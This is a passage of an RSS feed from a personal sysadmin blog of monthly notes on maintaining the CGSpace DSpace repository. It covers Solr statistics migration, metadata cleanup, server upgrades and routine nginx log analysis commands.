style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> + + + + January, 2021 + https://alanorth.github.io/cgspace-notes/2021-01/ + Sun, 03 Jan 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-01/ + <h2 id="2021-01-03">2021-01-03</h2> +<ul> +<li>Peter notified me that some filters on AReS were broken again +<ul> +<li>It&rsquo;s the same issue with the field 
names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li> +<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li> +</ul> +</li> +<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +<ul> +<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li> +<li>I adjusted it to default to 0 and added a note to the admin screen</li> +<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li> +<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li> +</ul> +</li> +</ul> + + + + December, 2020 + https://alanorth.github.io/cgspace-notes/2020-12/ + Tue, 01 Dec 2020 11:32:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-12/ + <h2 id="2020-12-01">2020-12-01</h2> +<ul> +<li>Atmire responded about the issue with duplicate data in our Solr statistics +<ul> +<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li> +<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li> +<li>I started processing those (about 411,000 records):</li> +</ul> +</li> +</ul> + + + + CGSpace DSpace 6 Upgrade + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + Sun, 15 Nov 2020 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p> + + + + November, 2020 + https://alanorth.github.io/cgspace-notes/2020-11/ + Sun, 01 Nov 2020 13:11:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-11/ + <h2 id="2020-11-01">2020-11-01</h2> +<ul> +<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +<ul> +<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li> +</ul> +</li> +</ul> + + + + October, 2020 + https://alanorth.github.io/cgspace-notes/2020-10/ + Tue, 06 Oct 2020 16:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-10/ + <h2 id="2020-10-06">2020-10-06</h2> +<ul> +<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a> +<ul> +<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li> +<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li> +</ul> +</li> +<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +<ul> +<li>During the FlywayDB migration I got an error:</li> +</ul> +</li> +</ul> + + + + September, 2020 + https://alanorth.github.io/cgspace-notes/2020-09/ + Wed, 02 Sep 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-09/ + <h2 id="2020-09-02">2020-09-02</h2> +<ul> 
+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li> +<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it +<ul> +<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li> +</ul> +</li> +<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li> +<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button +<ul> +<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li> +</ul> +</li> +<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li> +</ul> + + + + August, 2020 + https://alanorth.github.io/cgspace-notes/2020-08/ + Sun, 02 Aug 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-08/ + <h2 id="2020-08-02">2020-08-02</h2> +<ul> +<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values +<ul> +<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li> +<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li> +<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li> +</ul> +</li> +</ul> + + + + July, 2020 + https://alanorth.github.io/cgspace-notes/2020-07/ + Wed, 01 Jul 2020 10:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-07/ + <h2 id="2020-07-01">2020-07-01</h2> +<ul> +<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank +<ul> +<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li> +<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li> +<li>I restarted Tomcat and PostgreSQL and the issue was gone</li> +</ul> +</li> +<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li> +</ul> + + + + June, 2020 + https://alanorth.github.io/cgspace-notes/2020-06/ + Mon, 01 Jun 2020 13:55:39 +0300 + + https://alanorth.github.io/cgspace-notes/2020-06/ + <h2 id="2020-06-01">2020-06-01</h2> +<ul> +<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +<ul> +<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li> +</ul> +</li> +<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li> +<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li> +</ul> + + + + May, 2020 + https://alanorth.github.io/cgspace-notes/2020-05/ + Sat, 02 May 2020 09:52:04 +0300 + + https://alanorth.github.io/cgspace-notes/2020-05/ + <h2 id="2020-05-02">2020-05-02</h2> +<ul> +<li>Peter said that 
CTA is having problems submitting an item to CGSpace +<ul> +<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li> +<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li> +</ul> +</li> +</ul> + + + + April, 2020 + https://alanorth.github.io/cgspace-notes/2020-04/ + Thu, 02 Apr 2020 10:53:24 +0300 + + https://alanorth.github.io/cgspace-notes/2020-04/ + <h2 id="2020-04-02">2020-04-02</h2> +<ul> +<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +<ul> +<li>I updated the fifty-eight existing items on CGSpace</li> +</ul> +</li> +<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts: +<ul> +<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li> +<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li> +<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li> +</ul> +</li> +<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li> +</ul> + + + + March, 2020 + https://alanorth.github.io/cgspace-notes/2020-03/ + Mon, 02 Mar 2020 12:31:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-03/ + <h2 id="2020-03-02">2020-03-02</h2> +<ul> +<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs +<ul> +<li>Tag version 1.2.0 on GitHub</li> +</ul> +</li> +<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a> +<ul> +<li>You need to download this into the DSpace 6.x source and compile it</li> +</ul> +</li> +</ul> + + + + February, 2020 + https://alanorth.github.io/cgspace-notes/2020-02/ + Sun, 02 Feb 2020 11:56:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-02/ + <h2 id="2020-02-02">2020-02-02</h2> +<ul> +<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday +<ul> +<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li> +<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li> +<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li> +<li>The code finally builds and runs with a fresh install</li> +</ul> +</li> +</ul> + + + + January, 2020 + https://alanorth.github.io/cgspace-notes/2020-01/ + 
Mon, 06 Jan 2020 10:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-01/ + <h2 id="2020-01-06">2020-01-06</h2> +<ul> +<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li> +<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI +<ul> +<li>The score is now linked to the DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li> +</ul> +</li> +</ul> +<h2 id="2020-01-07">2020-01-07</h2> +<ul> +<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has +<ul> +<li>The DOI has a score of 259, but the Handle has no score at all</li> +<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li> +</ul> +</li> +</ul> + + + + December, 2019 + https://alanorth.github.io/cgspace-notes/2019-12/ + Sun, 01 Dec 2019 11:22:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-12/ + <h2 id="2019-12-01">2019-12-01</h2> +<ul> +<li>Upgrade CGSpace (linode18) to Ubuntu 18.04: +<ul> +<li>Check any packages that have residual configs and purge them:</li> +<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li> +<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade +# apt-get autoremove &amp;&amp; apt-get autoclean +# dpkg -C +# reboot +</code></pre> + + + + November, 2019 + https://alanorth.github.io/cgspace-notes/2019-11/ + Mon, 04 Nov 2019 12:20:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-11/ + <h2 id="2019-11-04">2019-11-04</h2> +<ul> +<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +<ul> +<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +4671942 +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +1277694 +</code></pre><ul> +<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> +<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; +1183456 +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; +106781 +</code></pre> + + + + October, 2019 + https://alanorth.github.io/cgspace-notes/2019-10/ + Tue, 01 Oct 2019 13:20:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-10/ + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit 
the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. + + + + September, 2019 + https://alanorth.github.io/cgspace-notes/2019-09/ + Sun, 01 Sep 2019 10:17:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-09/ + <h2 id="2019-09-01">2019-09-01</h2> +<ul> +<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> +<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 440 17.58.101.255 + 441 157.55.39.101 + 485 207.46.13.43 + 728 169.60.128.125 + 730 207.46.13.108 + 758 157.55.39.9 + 808 66.160.140.179 + 814 207.46.13.212 + 2472 163.172.71.23 + 6092 3.94.211.189 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 33 2a01:7e00::f03c:91ff:fe16:fcb + 57 3.83.192.124 + 57 3.87.77.25 + 57 54.82.1.8 + 822 2a01:9cc0:47:1:1a:4:0:2 + 1223 45.5.184.72 + 1633 172.104.229.92 + 5112 205.186.128.185 + 7249 2a01:7e00::f03c:91ff:fe18:7396 + 9124 45.5.186.2 +</code></pre> + + + + August, 2019 + https://alanorth.github.io/cgspace-notes/2019-08/ + Sat, 03 Aug 2019 12:39:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-08/ + <h2 id="2019-08-03">2019-08-03</h2> +<ul> +<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li> +</ul> +<h2 id="2019-08-04">2019-08-04</h2> +<ul> +<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it +<ul> +<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li> +<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li> +</ul> +</li> +<li>Run system updates on DSpace Test (linode19) and reboot it</li> +</ul> + + + + July, 2019 + https://alanorth.github.io/cgspace-notes/2019-07/ + Mon, 01 Jul 2019 12:13:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-07/ + <h2 id="2019-07-01">2019-07-01</h2> +<ul> +<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li> +<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: +<ul> +<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li> +<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li> +</ul> +</li> +<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li> +</ul> + + + + June, 2019 + https://alanorth.github.io/cgspace-notes/2019-06/ + Sun, 02 Jun 2019 10:57:51 +0300 + + 
https://alanorth.github.io/cgspace-notes/2019-06/ + <h2 id="2019-06-02">2019-06-02</h2> +<ul> +<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it</li> +</ul> +<h2 id="2019-06-03">2019-06-03</h2> +<ul> +<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li> +</ul> + + + + May, 2019 + https://alanorth.github.io/cgspace-notes/2019-05/ + Wed, 01 May 2019 07:37:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-05/ + <h2 id="2019-05-01">2019-05-01</h2> +<ul> +<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li> +<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +<ul> +<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li> +<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li> +</ul> +</li> +<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li> +</ul> +<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648; +DELETE 1 +</code></pre><ul> +<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li> +</ul> + + + + April, 2019 + https://alanorth.github.io/cgspace-notes/2019-04/ + Mon, 01 Apr 2019 09:00:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-04/ + <h2 id="2019-04-01">2019-04-01</h2> +<ul> +<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +<ul> +<li>They asked if we had plans to enable RDF support in CGSpace</li> +</ul> +</li> +<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +<ul> +<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 + 4432 200 +</code></pre><ul> +<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> +<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d +</code></pre> + + + + March, 2019 + https://alanorth.github.io/cgspace-notes/2019-03/ + Fri, 01 Mar 2019 12:16:30 +0100 + + https://alanorth.github.io/cgspace-notes/2019-03/ + <h2 id="2019-03-01">2019-03-01</h2> 
+<ul> +<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li> +<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li> +<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11 +<ul> +<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li> +<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li> +<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li> +<li>68.15% � 9.45 instead of 68.15% ± 9.45</li> +<li>2003�2013 instead of 2003–2013</li> +</ul> +</li> +<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li> +</ul> + + + + February, 2019 + https://alanorth.github.io/cgspace-notes/2019-02/ + Fri, 01 Feb 2019 21:37:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-02/ + <h2 id="2019-02-01">2019-02-01</h2> +<ul> +<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> +<li>The top IPs before, during, and after this latest alert tonight were:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 245 207.46.13.5 + 332 54.70.40.11 + 385 5.143.231.38 + 405 207.46.13.173 + 405 207.46.13.75 + 1117 66.249.66.219 + 1121 35.237.175.180 + 1546 5.9.6.51 + 2474 45.5.186.2 + 5490 85.25.237.71 +</code></pre><ul> +<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li> +<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> +<li>There were just over 3 million accesses in the nginx logs last month:</li> +</ul> +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; +3018243 + +real 0m19.873s +user 0m22.203s +sys 0m1.979s +</code></pre> + + + + January, 2019 + https://alanorth.github.io/cgspace-notes/2019-01/ + Wed, 02 Jan 2019 09:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-01/ + <h2 id="2019-01-02">2019-01-02</h2> +<ul> +<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> +<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 92 40.77.167.4 + 99 210.7.29.100 + 120 38.126.157.45 + 177 35.237.175.180 + 177 40.77.167.32 + 216 66.249.75.219 + 225 18.203.76.93 + 261 46.101.86.248 + 357 207.46.13.1 + 903 54.70.40.11 +</code></pre> + + + + December, 2018 + https://alanorth.github.io/cgspace-notes/2018-12/ + Sun, 02 Dec 2018 02:09:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-12/ + <h2 
id="2018-12-01">2018-12-01</h2> +<ul> +<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li> +<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li> +<li>Then I ran all system updates and restarted the server</li> +</ul> +<h2 id="2018-12-02">2018-12-02</h2> +<ul> +<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li> +</ul> + + + + November, 2018 + https://alanorth.github.io/cgspace-notes/2018-11/ + Thu, 01 Nov 2018 16:41:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-11/ + <h2 id="2018-11-01">2018-11-01</h2> +<ul> +<li>Finalize AReS Phase I and Phase II ToRs</li> +<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li> +</ul> +<h2 id="2018-11-03">2018-11-03</h2> +<ul> +<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li> +<li>Today these are the top 10 IPs:</li> +</ul> + + + + October, 2018 + https://alanorth.github.io/cgspace-notes/2018-10/ + Mon, 01 Oct 2018 22:31:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-10/ + <h2 id="2018-10-01">2018-10-01</h2> +<ul> +<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li> +<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li> +</ul> + + + + September, 2018 + https://alanorth.github.io/cgspace-notes/2018-09/ + Sun, 02 Sep 2018 09:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-09/ + <h2 id="2018-09-02">2018-09-02</h2> +<ul> +<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li> +<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li> +<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li> +<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li> +</ul> + + + + August, 2018 + https://alanorth.github.io/cgspace-notes/2018-08/ + Wed, 01 Aug 2018 11:52:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-08/ + <h2 id="2018-08-01">2018-08-01</h2> +<ul> +<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li> +</ul> +<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child +[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB +[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB +</code></pre><ul> +<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li> +<li>From the DSpace log I see that eventually Solr stopped responding, so I 
guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li> +<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li> +<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li> +<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li> +<li>I ran all system updates on DSpace Test and rebooted it</li> +</ul> + + + + July, 2018 + https://alanorth.github.io/cgspace-notes/2018-07/ + Sun, 01 Jul 2018 12:56:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-07/ + <h2 id="2018-07-01">2018-07-01</h2> +<ul> +<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li> +</ul> +<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace +</code></pre><ul> +<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li> +</ul> +<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue. +</code></pre> + + + + June, 2018 + https://alanorth.github.io/cgspace-notes/2018-06/ + Mon, 04 Jun 2018 19:49:54 -0700 + + https://alanorth.github.io/cgspace-notes/2018-06/ + <h2 id="2018-06-04">2018-06-04</h2> +<ul> +<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>) +<ul> +<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li> +</ul> +</li> +<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> +<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n +</code></pre><ul> +<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that 